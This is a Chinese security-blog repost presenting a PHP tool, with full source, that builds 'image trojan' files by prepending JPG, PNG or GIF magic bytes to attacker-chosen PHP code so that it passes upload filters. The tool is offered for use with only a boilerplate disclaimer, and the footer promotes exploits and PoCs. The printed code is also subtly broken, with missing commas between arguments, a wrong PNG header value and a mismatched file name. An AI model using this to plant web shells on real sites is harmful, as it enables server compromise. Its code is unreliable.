上传漏洞绕过文件头校验的利用工具
2023-6-8 10:41:43 Author: WIN哥学安全(查看原文) 阅读量:18 收藏

1免责声明

本公众号所发布的文章及工具代码等仅限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。

2工具介绍

本脚本用于bypass文件头校验,支持jpg|png|gif格式文件。

3安装与使用

在环境的地址栏输入type参数,填入你想要的类型,再输入cmd参数,填入你想要的php代码,允许不输入cmd,默认采用phpinfo,以便探测图片马能否正常使用。type和cmd都可以用get/post方式传入。

例如:?type=jpg回显:创建成功!文件内容: ÿØ<?php phpinfo();?>

4源码文件

<!DOCTYPE html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=0.5, maximum-scale=2.0, user-scalable=yes" />
</head>
</html>
<?php
$cmd = '<?php phpinfo();?>';
// 读取输入的命令
if(!empty($_REQUEST['cmd'])){
    $cmd=$_REQUEST['cmd'];
}
// 输入产生文件的类型
function makeTrick($typeCode){
    switch($typeCode){
        case 'jpg':
            $fileType = Array(255,216);
            break;
        case 'png':
            $fileType = Array(137,800);
            break;
        case 'gif':
            $fileType = Array(71,73);
            break;
        default:
            $fileType = Null;
    }
    return $fileType;
}
function load($fileType,$cmd$ext){
    // 读取输入的文件类型
    if(!empty($fileType)) {
        $data = pack('C2'$fileType[0], $fileType[1]);
        $file = fopen('profile'.$ext"wb");
        // 写入文件头
        $bin = fwrite($file$data);
        // 写入命令
        $bin2 = fwrite($file$cmd);
        fclose($file);
        $file = fopen('profile'.$ext"r");
        echo '创建成功!文件内容:</br>';
        echo htmlentities(fread($file, filesize('tmp_pack.txt')));
        fclose($file);
    }
}
if(!empty($_REQUEST['type'])) {
    $ext = $_REQUEST['type'];
    $fileType = makeTrick($ext);
    load($fileType$cmd$ext);
}else{
    echo '请用get方式输入type参数和cmd参数(可选,默认phpinfo)';
}
Tips:

文章来源:GitHub

下载地址:公众号回复“20230608”获取项目地址

AWVS 已经更新至15.6 版本,后台获取

往期精彩

工具获取回复“burp”“awvs”“nessus”“ladon”"Forfity"等可以。

快速攻击全自动化工具JuD

Exp-Tools 1.1.3版本发布

GUI-tools渗透测试工具箱框架

阿波罗自动化攻击评估系统

 微软 Word RCE附PoC

Clash最新远程代码执行漏洞(附POC)

禅道系统权限绕过与命令执行漏洞(附POC)

【附EXP】CVE-2022-40684 & CVE-2022-22954

网络安全应急预案合集

师傅们求点赞,求支持!

文章来源: http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247493242&idx=1&sn=6609f5e993fc4265e169260c6c90dc7d&chksm=c0c8478ef7bfce985379ad301f14eac7b6b82b6c1b4bac7057886e66411a5cf38adda8ff3985#rd
如有侵权请联系:admin#unsafe.sh